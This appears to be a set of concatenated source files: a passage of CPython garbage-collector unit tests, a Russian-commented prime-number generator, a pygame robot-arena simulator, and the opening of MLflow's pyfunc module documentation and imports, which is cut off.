class B(object):
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
def test_function(self):
# Tricky: f -> d -> f, code should call d.clear() after the exec to
# break the cycle.
d = {}
exec("def f(): pass\n", d)
gc.collect()
del d
self.assertEqual(gc.collect(), 2)
@refcount_test
def test_frame(self):
def f():
frame = sys._getframe()
gc.collect()
f()
self.assertEqual(gc.collect(), 1)
def test_saveall(self):
# Verify that cyclic garbage like lists show up in gc.garbage if the
# SAVEALL option is enabled.
# First make sure we don't save away other stuff that just happens to
# be waiting for collection.
gc.collect()
# if this fails, someone else created immortal trash
self.assertEqual(gc.garbage, [])
L = []
L.append(L)
id_L = id(L)
debug = gc.get_debug()
gc.set_debug(debug | gc.DEBUG_SAVEALL)
del L
gc.collect()
gc.set_debug(debug)
self.assertEqual(len(gc.garbage), 1)
obj = gc.garbage.pop()
self.assertEqual(id(obj), id_L)
def test_del(self):
# __del__ methods can trigger collection, make this to happen
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A:
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
def test_del_newclass(self):
# __del__ methods can trigger collection, make this to happen
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A(object):
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
# The following two tests are fragile:
# They precisely count the number of allocations,
# which is highly implementation-dependent.
# For example, disposed tuples are not freed, but reused.
# To minimize variations, though, we first store the get_count() results
# and check them at the end.
@refcount_test
def test_get_count(self):
gc.collect()
a, b, c = gc.get_count()
x = []
d, e, f = gc.get_count()
self.assertEqual((b, c), (0, 0))
self.assertEqual((e, f), (0, 0))
# This is less fragile than asserting that a equals 0.
self.assertLess(a, 5)
# Between the two calls to get_count(), at least one object was
# created (the list).
self.assertGreater(d, a)
@refcount_test
def test_collect_generations(self):
gc.collect()
# This object will "trickle" into generation N + 1 after
# each call to collect(N)
x = []
gc.collect(0)
# x is now in gen 1
a, b, c = gc.get_count()
gc.collect(1)
# x is now in gen 2
d, e, f = gc.get_count()
gc.collect(2)
# x is now in gen 3
g, h, i = gc.get_count()
# We don't check a, d, g since their exact values depends on
# internal implementation details of the interpreter.
self.assertEqual((b, c), (1, 0))
self.assertEqual((e, f), (0, 1))
self.assertEqual((h, i), (0, 0))
def test_trashcan(self):
class Ouch:
n = 0
def __del__(self):
Ouch.n = Ouch.n + 1
if Ouch.n % 17 == 0:
gc.collect()
# "trashcan" is a hack to prevent stack overflow when deallocating
# very deeply nested tuples etc. It works in part by abusing the
# type pointer and refcount fields, and that can yield horrible
# problems when gc tries to traverse the structures.
# If this test fails (as it does in 2.0, 2.1 and 2.2), it will
# most likely die via segfault.
# Note: In 2.3 the possibility for compiling without cyclic gc was
# removed, and that in turn allows the trashcan mechanism to work
# via much simpler means (e.g., it never abuses the type pointer or
# refcount fields anymore). Since it's much less likely to cause a
# problem now, the various constants in this expensive (we force a lot
# of full collections) test are cut back from the 2.2 version.
gc.enable()
N = 150
for count in range(2):
t = []
for i in range(N):
t = [t, Ouch()]
u = []
for i in range(N):
u = [u, Ouch()]
v = {}
for i in range(N):
v = {1: v, 2: Ouch()}
gc.disable()
@unittest.skipUnless(threading, "test meaningless on builds without threads")
def test_trashcan_threads(self):
# Issue #13992: trashcan mechanism should be thread-safe
NESTING = 60
N_THREADS = 2
def sleeper_gen():
"""A generator that releases the GIL when closed or dealloc'ed."""
try:
yield
finally:
time.sleep(0.000001)
class C(list):
# Appending to a list is atomic, which avoids the use of a lock.
inits = []
dels = []
def __init__(self, alist):
self[:] = alist
C.inits.append(None)
def __del__(self):
# This __del__ is called by subtype_dealloc().
C.dels.append(None)
# `g` will release the GIL when garbage-collected. This
# helps assert subtype_dealloc's behaviour when threads
# switch in the middle of it.
g = sleeper_gen()
next(g)
# Now that __del__ is finished, subtype_dealloc will proceed
# to call list_dealloc, which also uses the trashcan mechanism.
def make_nested():
"""Create a sufficiently nested container object so that the
trashcan mechanism is invoked when deallocating it."""
x = C([])
for i in range(NESTING):
x = [C([x])]
del x
def run_thread():
"""Exercise make_nested() in a loop."""
while not exit:
make_nested()
old_switchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-5)
try:
exit = False
threads = []
for i in range(N_THREADS):
t = threading.Thread(target=run_thread)
threads.append(t)
for t in threads:
t.start()
time.sleep(1.0)
exit = True
for t in threads:
t.join()
finally:
sys.setswitchinterval(old_switchinterval)
gc.collect()
self.assertEqual(len(C.inits), len(C.dels))
def test_boom(self):
class Boom:
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom()
b = Boom()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# a<->b are in a trash cycle now. Collection will invoke
# Boom.__getattr__ (to see whether a and b have __del__ methods), and
# __getattr__ deletes the internal "attr" attributes as a side effect.
# That causes the trash cycle to get reclaimed via refcounts falling to
# 0, thus mutating the trash graph as a side effect of merely asking
# whether __del__ exists. This used to (before 2.3b1) crash Python.
# Now __getattr__ isn't called.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2(self):
class Boom2:
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2()
b = Boom2()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# Much like test_boom(), except that __getattr__ doesn't break the
# cycle until the second time gc checks for __del__. As of 2.3b1,
# there isn't a second time, so this simply cleans up the trash cycle.
# We expect a, b, a.__dict__ and b.__dict__ (4 objects) to get
# reclaimed this way.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom_new(self):
# boom__new and boom2_new are exactly like boom and boom2, except use
# new-style classes.
class Boom_New(object):
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom_New()
b = Boom_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2_new(self):
class Boom2_New(object):
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2_New()
b = Boom2_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_get_referents(self):
alist = [1, 3, 5]
got = gc.get_referents(alist)
got.sort()
self.assertEqual(got, alist)
atuple = tuple(alist)
got = gc.get_referents(atuple)
got.sort()
self.assertEqual(got, alist)
adict = {1: 3, 5: 7}
expected = [1, 3, 5, 7]
got = gc.get_referents(adict)
got.sort()
self.assertEqual(got, expected)
got = gc.get_referents([1, 2], {3: 4}, (0, 0, 0))
got.sort()
self.assertEqual(got, [0, 0] + list(range(5)))
self.assertEqual(gc.get_referents(1, 'a', 4j), [])
def test_is_tracked(self):
# Atomic built-in types are not tracked, user-defined objects and
# mutable containers are.
# NOTE: types with special optimizations (e.g. tuple) have tests
# in their own test files instead.
self.assertFalse(gc.is_tracked(None))
self.assertFalse(gc.is_tracked(1))
self.assertFalse(gc.is_tracked(1.0))
self.assertFalse(gc.is_tracked(1.0 + 5.0j))
self.assertFalse(gc.is_tracked(True))
self.assertFalse(gc.is_tracked(False))
self.assertFalse(gc.is_tracked(b"a"))
self.assertFalse(gc.is_tracked("a"))
self.assertFalse(gc.is_tracked(bytearray(b"a")))
self.assertFalse(gc.is_tracked(type))
self.assertFalse(gc.is_tracked(int))
self.assertFalse(gc.is_tracked(object))
self.assertFalse(gc.is_tracked(object()))
class UserClass:
pass
self.assertTrue(gc.is_tracked(gc))
self.assertTrue(gc.is_tracked(UserClass))
self.assertTrue(gc.is_tracked(UserClass()))
self.assertTrue(gc.is_tracked([]))
self.assertTrue(gc.is_tracked(set()))
def test_bug1055820b(self):
# Corresponds to temp2b.py in the bug report.
ouch = []
def callback(ignored):
ouch[:] = [wr() for wr in WRs]
Cs = [C1055820(i) for i in range(2)]
WRs = [weakref.ref(c, callback) for c in Cs]
c = None
gc.collect()
self.assertEqual(len(ouch), 0)
# Make the two instances trash, and collect again. The bug was that
# the callback materialized a strong reference to an instance, but gc
# cleared the instance's dict anyway.
Cs = None
gc.collect()
self.assertEqual(len(ouch), 2) # else the callbacks didn't run
for x in ouch:
# If the callback resurrected one of these guys, the instance
# would be damaged, with an empty __dict__.
self.assertEqual(x, None)
def test_garbage_at_shutdown(self):
import subprocess
code = """if 1:
import gc
class X:
def __init__(self, name):
self.name = name
def __repr__(self):
return "<X %%r>" %% self.name
def __del__(self):
pass
x = X('first')
x.x = x
x.y = X('second')
del x
gc.set_debug(%s)
"""
def run_command(code):
p = subprocess.Popen([sys.executable, "-Wd", "-c", code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
p.stdout.close()
p.stderr.close()
self.assertEqual(p.returncode, 0)
self.assertEqual(stdout.strip(), b"")
return strip_python_stderr(stderr)
stderr = run_command(code % "0")
self.assertIn(b"ResourceWarning: gc: 2 uncollectable objects at "
b"shutdown; use", stderr)
self.assertNotIn(b"<X 'first'>", stderr)
# With DEBUG_UNCOLLECTABLE, the garbage list gets printed
stderr = run_command(code % "gc.DEBUG_UNCOLLECTABLE")
self.assertIn(b"ResourceWarning: gc: 2 uncollectable objects at "
b"shutdown", stderr)
self.assertTrue(
(b"[<X 'first'>, <X 'second'>]" in stderr) or
(b"[<X 'second'>, <X 'first'>]" in stderr), stderr)
# With DEBUG_SAVEALL, no additional message should get printed
# (because gc.garbage also contains normally reclaimable cyclic
# references, and its elements get printed at runtime anyway).
stderr = run_command(code % "gc.DEBUG_SAVEALL")
self.assertNotIn(b"uncollectable objects at shutdown", stderr)
class GCCallbackTests(unittest.TestCase):
def setUp(self):
# Save gc state and disable it.
self.enabled = gc.isenabled()
gc.disable()
self.debug = gc.get_debug()
gc.set_debug(0)
gc.callbacks.append(self.cb1)
gc.callbacks.append(self.cb2)
self.othergarbage = []
def tearDown(self):
# Restore gc state
del self.visit
gc.callbacks.remove(self.cb1)
gc.callbacks.remove(self.cb2)
gc.set_debug(self.debug)
if self.enabled:
gc.enable()
# destroy any uncollectables
gc.collect()
for obj in gc.garbage:
if isinstance(obj, Uncollectable):
obj.partner = None
del gc.garbage[:]
del self.othergarbage
gc.collect()
def preclean(self):
# Remove all fluff from the system. Invoke this function
# manually rather than through self.setUp() for maximum
# safety.
self.visit = []
gc.collect()
garbage, gc.garbage[:] = gc.garbage[:], []
self.othergarbage.append(garbage)
self.visit = []
def cb1(self, phase, info):
self.visit.append((1, phase, dict(info)))
def cb2(self, phase, info):
self.visit.append((2, phase, dict(info)))
if phase == "stop" and hasattr(self, "cleanup"):
# Clean Uncollectable from garbage
uc = [e for e in gc.garbage if isinstance(e, Uncollectable)]
gc.garbage[:] = [e for e in gc.garbage
if not isinstance(e, Uncollectable)]
for e in uc:
e.partner = None
def test_collect(self):
self.preclean()
gc.collect()
# Algorithmically verify the contents of self.visit
# because it is long and tortuous.
# Count the number of visits to each callback
n = [v[0] for v in self.visit]
n1 = [i for i in n if i == 1]
n2 = [i for i in n if i == 2]
self.assertEqual(n1, [1]*2)
self.assertEqual(n2, [2]*2)
# Count that we got the right number of start and stop callbacks.
n = [v[1] for v in self.visit]
n1 = [i for i in n if i == "start"]
n2 = [i for i in n if i == "stop"]
self.assertEqual(n1, ["start"]*2)
self.assertEqual(n2, ["stop"]*2)
# Check that we got the right info dict for all callbacks
for v in self.visit:
info = v[2]
self.assertTrue("generation" in info)
self.assertTrue("collected" in info)
self.assertTrue("uncollectable" in info)
def test_collect_generation(self):
self.preclean()
gc.collect(2)
for v in self.visit:
info = v[2]
self.assertEqual(info["generation"], 2)
def test_collect_garbage(self):
self.preclean()
# Each of these cause four objects to be garbage: Two
# Uncolectables and their instance dicts.
Uncollectable()
Uncollectable()
C1055820(666)
gc.collect()
for v in self.visit:
if v[1] != "stop":
continue
info = v[2]
self.assertEqual(info["collected"], 2)
self.assertEqual(info["uncollectable"], 8)
# We should now have the Uncollectables in gc.garbage
self.assertEqual(len(gc.garbage), 4)
for e in gc.garbage:
self.assertIsInstance(e, Uncollectable)
# Now, let our callback handle the Uncollectable instances
self.cleanup=True
self.visit = []
gc.garbage[:] = []
gc.collect()
for v in self.visit:
if v[1] != "stop":
continue
info = v[2]
self.assertEqual(info["collected"], 0)
self.assertEqual(info["uncollectable"], 4)
# Uncollectables should be gone
self.assertEqual(len(gc.garbage), 0)
class GCTogglingTests(unittest.TestCase):
def setUp(self):
gc.enable()
def tearDown(self):
gc.disable()
def test_bug1055820c(self):
# Corresponds to temp2c.py in the bug report. This is pretty
# elaborate.
c0 = C1055820(0)
# Move c0 into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_c0_alive = c0
del c0.loop # now only c1 keeps c0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
ouch = []
def callback(ignored):
ouch[:] = [c2wr()]
# The callback gets associated with a wr on an object in generation 2.
c0wr = weakref.ref(c0, callback)
c0 = c1 = c2 = None
# What we've set up: c0, c1, and c2 are all trash now. c0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's a
# global weakref to c2 (c2wr), but that weakref has no callback.
# There's also a global weakref to c0 (c0wr), and that does have a
# callback, and that callback references c2 via c2wr().
#
# c0 has a wr with callback, which references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see c0 at all, and c0 is
# the only object that has a weakref with a callback. gc clears c1
# and c2. Clearing c1 has the side effect of dropping the refcount on
# c0 to 0, so c0 goes away (despite that it's in an older generation)
# and c0's wr callback triggers. That in turn materializes a reference
# to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
junk = []
i = 0
detector = GC_Detector()
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else the callback wasn't invoked
for x in ouch:
# If the callback resurrected c2, the instance would be damaged,
# with an empty __dict__.
self.assertEqual(x, None)
def test_bug1055820d(self):
# Corresponds to temp2d.py in the bug report. This is very much like
# test_bug1055820c, but uses a __del__ method instead of a weakref
# callback to sneak in a resurrection of cyclic trash.
ouch = []
class D(C1055820):
def __del__(self):
ouch[:] = [c2wr()]
d0 = D(0)
# Move all the above into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_d0_alive = d0
del d0.loop # now only c1 keeps d0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
d0 = c1 = c2 = None
# What we've set up: d0, c1, and c2 are all trash now. d0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's
# a global weakref to c2 (c2wr), but that weakref has no callback.
# There are no other weakrefs.
#
# d0 has a __del__ method that references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see d0 at all. gc clears
# c1 and c2. Clearing c1 has the side effect of dropping the refcount
# on d0 to 0, so d0 goes away (despite that it's in an older
# generation) and d0's __del__ triggers. That in turn materializes
# a reference to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
detector = GC_Detector()
junk = []
i = 0
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else __del__ wasn't invoked
for x in ouch:
# If __del__ resurrected c2, the instance would be damaged, with an
# empty __dict__.
self.assertEqual(x, None)
def test_main():
enabled = gc.isenabled()
gc.disable()
assert not gc.isenabled()
debug = gc.get_debug()
gc.set_debug(debug & ~gc.DEBUG_LEAK) # this test is supposed to leak
try:
gc.collect() # Delete 2nd generation garbage
run_unittest(GCTests, GCTogglingTests, GCCallbackTests)
finally:
gc.set_debug(debug)
# test gc.enable() even if GC is disabled by default
if verbose:
print("restoring automatic collection")
# make sure to always test gc.enable()
gc.enable()
assert gc.isenabled()
if not enabled:
gc.disable()
if __name__ == "__main__":
test_main()
|
primes.py | # Набор функций для генерации простых чисел заданной длины.
import random
import multiprocessing
import math
global_primes_list = [] # хранение списка простых чисел
CHECK_STEPS = 100 # раундов для проверки Ферма
ERATO_PRIMES = 1000 # до какого протого числа делать решето
def write_to_file():
file = open("primes.txt", "w")
file.write(str(ERATO_PRIMES) + "\n")
file.writelines(str(global_primes_list))
file.close()
def read_from_file():
global global_primes_list
out = []
file = open("primes.txt", "r")
n = file.readlines()[1]
f = n[1:-1].split(", ")
for i in f:
out.append(int(i))
global_primes_list = out
def get_prime_list():
try:
primes_file = open("primes.txt", "r")
primes_in_file = primes_file.readlines()[0]
primes_file.close()
except(IOError, IndexError):
print(u"Файл с простыми не найден, создаем")
eratosthenes()
write_to_file()
return
if int(primes_in_file) != ERATO_PRIMES:
print(u"Файл найден, но чисел не столько сколько надо")
eratosthenes()
write_to_file()
return
read_from_file()
def eratosthenes():
primes = []
multiples = []
for i in range(2, ERATO_PRIMES+1):
if i not in multiples:
primes.append(i)
multiples.extend(range(i*i, ERATO_PRIMES+1, i))
global global_primes_list
global_primes_list = primes
print(global_primes_list)
def check_with_primes(number):
for prime in global_primes_list:
if number % prime == 0:
#print(u"+", end='', flush=True)
return False
return True
def test_fermat(number):
for i in range(CHECK_STEPS):
a = random.randint(2, number)
if pow(a, number-1, number) != 1:
#print(u"-", end='', flush=True)
return False
return True
# def generate_prime_threads(len, threads):
def generate_prime(length, cycles=1000000):
for i in range(cycles):
n = random.randint(2 ** (length-1), 2 ** length)
if check_with_primes(n) is True and test_fermat(n) is True:
# print("\n")
# print(u"Вышло.")
# print(n)
# print(u"................")
return n
# print(u"Не вышло.")
return -1
def generate_prime_threads(length, threads_c):
q = multiprocessing.Queue()
a_stop_event = multiprocessing.Event()
def generate_key_thread(length):
while not a_stop_event.is_set():
a = generate_prime(length, 1)
if a > 0:
q.put(a)
return
q.empty()
a_stop_event.clear()
threads = [multiprocessing.Process(target=generate_key_thread, args=(length,)) for i in range(threads_c)]
for th in threads:
th.start()
result = q.get()
a_stop_event.set()
for th in threads:
th.join()
print("")
pretty_print_prime(length, result)
return result
def generate_prime_range(start, stop):
cycles = 1000000
for i in range(cycles):
n = random.randint(start, stop)
if check_with_primes(n) is True and test_fermat(n) is True:
print("\n", flush=True)
return n
def pretty_print_prime(length, number):
side = math.sqrt(length)
if not side.is_integer():
return
side = int(side/2)
encoded = encodeN(number, 16)
print("+" + "-"*side + "+")
for i in range(side):
print("|" + encoded[i*side:(i+1)*side] + "|")
print("+" + "-"*int(side) + "+")
def encodeN(n,N,D="1234567890ABCDEF"):
return (encodeN(n//N,N)+D[n%N]).lstrip("0") if n>0 else "0"
|
simulator.py | from __future__ import division
import threading
import pygame
from .arenas import PiratePlunderArena, CTFArena, SunnySideUpArena, ABCArena, CalderaArena, TwoColoursArena
from .display import Display
DEFAULT_GAME = 'caldera'
GAMES = {'caldera': CalderaArena,
'pirate-plunder': PiratePlunderArena,
'ctf': CTFArena,
'sunny-side-up': SunnySideUpArena,
'abc': ABCArena,
'two-colours': TwoColoursArena,
}
class Simulator(object):
def __init__(self, config={}, size=(8, 8), frames_per_second=30, background=True):
try:
game_name = config['game']
del config['game']
except KeyError:
game_name = DEFAULT_GAME
game = GAMES[game_name]
self.arena = game(**config)
self.display = Display(self.arena)
self.background = background
self.frames_per_second = frames_per_second
if self.background:
self._loop_thread = threading.Thread(target=self._main_loop, args=(frames_per_second,))
self._loop_thread.setDaemon(True)
self._loop_thread.start()
def run(self):
if self.background:
raise RuntimeError('Simulator runs in the background. Try passing background=False')
self._main_loop(self.frames_per_second)
def _main_loop(self, frames_per_second):
clock = pygame.time.Clock()
while True:
if any(event.type == pygame.QUIT
or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE)
for event in pygame.event.get()):
break
self.display.tick(1/frames_per_second)
clock.tick(frames_per_second)
pygame.quit()
|
__init__.py | """
The ``python_function`` model flavor serves as a default model interface for MLflow Python models.
Any MLflow Python model is expected to be loadable as a ``python_function`` model.
In addition, the ``mlflow.pyfunc`` module defines a generic :ref:`filesystem format
<pyfunc-filesystem-format>` for Python models and provides utilities for saving to and loading from
this format. The format is self contained in the sense that it includes all necessary information
for anyone to load it and use it. Dependencies are either stored directly with the model or
referenced via a Conda environment.
The ``mlflow.pyfunc`` module also defines utilities for creating custom ``pyfunc`` models
using frameworks and inference logic that may not be natively included in MLflow. See
:ref:`pyfunc-create-custom`.
.. _pyfunc-inference-api:
*************
Inference API
*************
Python function models are loaded as an instance of :py:class:`PyFuncModel
<mlflow.pyfunc.PyFuncModel>`, which is an MLflow wrapper around the model implementation and model
metadata (MLmodel file). You can score the model by calling the :py:func:`predict()
<mlflow.pyfunc.PyFuncModel.predict>` method, which has the following signature::
predict(
model_input: [pandas.DataFrame, numpy.ndarray, scipy.sparse.(csc.csc_matrix | csr.csr_matrix),
List[Any], Dict[str, Any]]
) -> [numpy.ndarray | pandas.(Series | DataFrame) | List]
All PyFunc models will support `pandas.DataFrame` as input and DL PyFunc models will also support
tensor inputs in the form of Dict[str, numpy.ndarray] (named tensors) and `numpy.ndarrays`
(unnamed tensors).
.. _pyfunc-filesystem-format:
*****************
Filesystem format
*****************
The Pyfunc format is defined as a directory structure containing all required data, code, and
configuration::
./dst-path/
./MLmodel: configuration
<code>: code packaged with the model (specified in the MLmodel file)
<data>: data packaged with the model (specified in the MLmodel file)
<env>: Conda environment definition (specified in the MLmodel file)
The directory structure may contain additional contents that can be referenced by the ``MLmodel``
configuration.
.. _pyfunc-model-config:
MLModel configuration
#####################
A Python model contains an ``MLmodel`` file in **python_function** format in its root with the
following parameters:
- loader_module [required]:
Python module that can load the model. Expected as module identifier
e.g. ``mlflow.sklearn``, it will be imported using ``importlib.import_module``.
The imported module must contain a function with the following signature::
_load_pyfunc(path: string) -> <pyfunc model implementation>
The path argument is specified by the ``data`` parameter and may refer to a file or
directory. The model implementation is expected to be an object with a
``predict`` method with the following signature::
predict(
model_input: [pandas.DataFrame, numpy.ndarray,
scipy.sparse.(csc.csc_matrix | csr.csr_matrix), List[Any], Dict[str, Any]]
) -> [numpy.ndarray | pandas.(Series | DataFrame) | List]
- code [optional]:
Relative path to a directory containing the code packaged with this model.
All files and directories inside this directory are added to the Python path
prior to importing the model loader.
- data [optional]:
Relative path to a file or directory containing model data.
The path is passed to the model loader.
- env [optional]:
Relative path to an exported Conda environment. If present this environment
should be activated prior to running the model.
- Optionally, any additional parameters necessary for interpreting the serialized model in
``pyfunc`` format.
.. rubric:: Example
::
tree example/sklearn_iris/mlruns/run1/outputs/linear-lr
::
├── MLmodel
├── code
│ ├── sklearn_iris.py
│
├── data
│ └── model.pkl
└── mlflow_env.yml
::
cat example/sklearn_iris/mlruns/run1/outputs/linear-lr/MLmodel
::
python_function:
code: code
data: data/model.pkl
loader_module: mlflow.sklearn
env: mlflow_env.yml
main: sklearn_iris
.. _pyfunc-create-custom:
******************************
Creating custom Pyfunc models
******************************
MLflow's persistence modules provide convenience functions for creating models with the
``pyfunc`` flavor in a variety of machine learning frameworks (scikit-learn, Keras, Pytorch, and
more); however, they do not cover every use case. For example, you may want to create an MLflow
model with the ``pyfunc`` flavor using a framework that MLflow does not natively support.
Alternatively, you may want to build an MLflow model that executes custom logic when evaluating
queries, such as preprocessing and postprocessing routines. Therefore, ``mlflow.pyfunc``
provides utilities for creating ``pyfunc`` models from arbitrary code and model data.
The :meth:`save_model()` and :meth:`log_model()` methods are designed to support multiple workflows
for creating custom ``pyfunc`` models that incorporate custom inference logic and artifacts
that the logic may require.
An `artifact` is a file or directory, such as a serialized model or a CSV. For example, a
serialized TensorFlow graph is an artifact. An MLflow model directory is also an artifact.
.. _pyfunc-create-custom-workflows:
Workflows
#########
:meth:`save_model()` and :meth:`log_model()` support the following workflows:
1. Programmatically defining a new MLflow model, including its attributes and artifacts.
Given a set of artifact URIs, :meth:`save_model()` and :meth:`log_model()` can
automatically download artifacts from their URIs and create an MLflow model directory.
In this case, you must define a Python class which inherits from :class:`~PythonModel`,
defining ``predict()`` and, optionally, ``load_context()``. An instance of this class is
specified via the ``python_model`` parameter; it is automatically serialized and deserialized
as a Python class, including all of its attributes.
2. Interpreting pre-existing data as an MLflow model.
If you already have a directory containing model data, :meth:`save_model()` and
:meth:`log_model()` can import the data as an MLflow model. The ``data_path`` parameter
specifies the local filesystem path to the directory containing model data.
In this case, you must provide a Python module, called a `loader module`. The
loader module defines a ``_load_pyfunc()`` method that performs the following tasks:
- Load data from the specified ``data_path``. For example, this process may include
deserializing pickled Python objects or models or parsing CSV files.
- Construct and return a pyfunc-compatible model wrapper. As in the first
use case, this wrapper must define a ``predict()`` method that is used to evaluate
queries. ``predict()`` must adhere to the :ref:`pyfunc-inference-api`.
The ``loader_module`` parameter specifies the name of your loader module.
For an example loader module implementation, refer to the `loader module
implementation in mlflow.keras <https://github.com/mlflow/mlflow/blob/
74d75109aaf2975f5026104d6125bb30f4e3f744/mlflow/keras.py#L157-L187>`_.
.. _pyfunc-create-custom-selecting-workflow:
Which workflow is right for my use case?
########################################
We consider the first workflow to be more user-friendly and generally recommend it for the
following reasons:
- It automatically resolves and collects specified model artifacts.
- It automatically serializes and deserializes the ``python_model`` instance and all of
its attributes, reducing the amount of user logic that is required to load the model
- You can create Models using logic that is defined in the ``__main__`` scope. This allows
custom models to be constructed in interactive environments, such as notebooks and the Python
REPL.
You may prefer the second, lower-level workflow for the following reasons:
- Inference logic is always persisted as code, rather than a Python object. This makes logic
easier to inspect and modify later.
- If you have already collected all of your model data in a single location, the second
workflow allows it to be saved in MLflow format directly, without enumerating constituent
artifacts.
"""
import importlib
import tempfile
import signal
import sys
import numpy as np
import os
import pandas
import yaml
from copy import deepcopy
import logging
import threading
import collections
import subprocess
from typing import Any, Union, List, Dict, Iterator, Tuple
import mlflow
import mlflow.pyfunc.model
from mlflow.models import Model, ModelSignature, ModelInputExample
from mlflow.models.model import MLMODEL_FILE_NAME
from mlflow.models.utils import _save_example
from mlflow.pyfunc.model import ( # pylint: disable=unused-import
PythonModel,
PythonModelContext,
get_default_conda_env,
)
from mlflow.pyfunc.model import get_default_pip_requirements
from mlflow.tracking.artifact_utils import _download_artifact_from_uri
from mlflow.types import DataType, Schema, TensorSpec
from mlflow.types.utils import clean_tensor_type
from mlflow.utils import PYTHON_VERSION, get_major_minor_py_version
from mlflow.utils.annotations import deprecated
from mlflow.utils.file_utils import _copy_file_or_tree, write_to
from mlflow.utils.model_utils import (
_get_flavor_configuration,
_validate_and_copy_code_paths,
_add_code_from_conf_to_system_path,
_get_flavor_configuration_from_uri,
_validate_and_prepare_target_save_path,
)
from mlflow.utils.uri import append_to_uri_path
from mlflow.utils.environment import (
_EnvManager,
_validate_env_arguments,
_process_pip_requirements,
_process_conda_env,
_CONDA_ENV_FILE_NAME,
_REQUIREMENTS_FILE_NAME,
_CONSTRAINTS_FILE_NAME,
)
from mlflow.utils.docstring_utils import format_docstring, LOG_MODEL_PARAM_DOCS
from mlflow.utils.databricks_utils import is_in_databricks_runtime
from mlflow.utils.file_utils import get_or_create_tmp_dir, get_or_create_nfs_tmp_dir
from mlflow.utils.process import cache_return_value_per_process
from mlflow.exceptions import MlflowException
from mlflow.tracking._model_registry import DEFAULT_AWAIT_MAX_SLEEP_SECONDS
from mlflow.protos.databricks_pb2 import (
INVALID_PARAMETER_VALUE,
RESOURCE_DOES_NOT_EXIST,
)
from scipy.sparse import csc_matrix, csr_matrix
from mlflow.utils.requirements_utils import (
_check_requirement_satisfied,
_parse_requirements,
)
from mlflow.utils import find_free_port
from mlflow.utils.nfs_on_spark import get_nfs_cache_root_dir
FLAVOR_NAME = "python_function"
MAIN = "loader_module"
CODE = "code"
DATA = "data"
ENV = "env"
PY_VERSION = "python_version"
_logger = logging.getLogger(__name__)
PyFuncInput = Union[pandas.DataFrame, np.ndarray, csc_matrix, csr_matrix, List[Any], Dict[str, Any]]
PyFuncOutput = Union[pandas.DataFrame, pandas.Series, np.ndarray, list]
def add_to_model(model, loader_module, data=None, code=None, env=None, **kwargs):
"""
Add a ``pyfunc`` spec to the model configuration.
Defines ``pyfunc`` configuration schema. Caller can use this to create a valid ``pyfunc`` model
flavor out of an existing directory structure. For example, other model flavors can use this to
specify how to use their output as a ``pyfunc``.
NOTE:
All paths are relative to the exported model root directory.
:param model: Existing model.
:param loader_module: The module to be used to load the model.
:param data: Path to the model data.
:param code: Path to the code dependencies.
:param env: Conda environment.
:param req: pip requirements file.
:param kwargs: Additional key-value pairs to include in the ``pyfunc`` flavor specification.
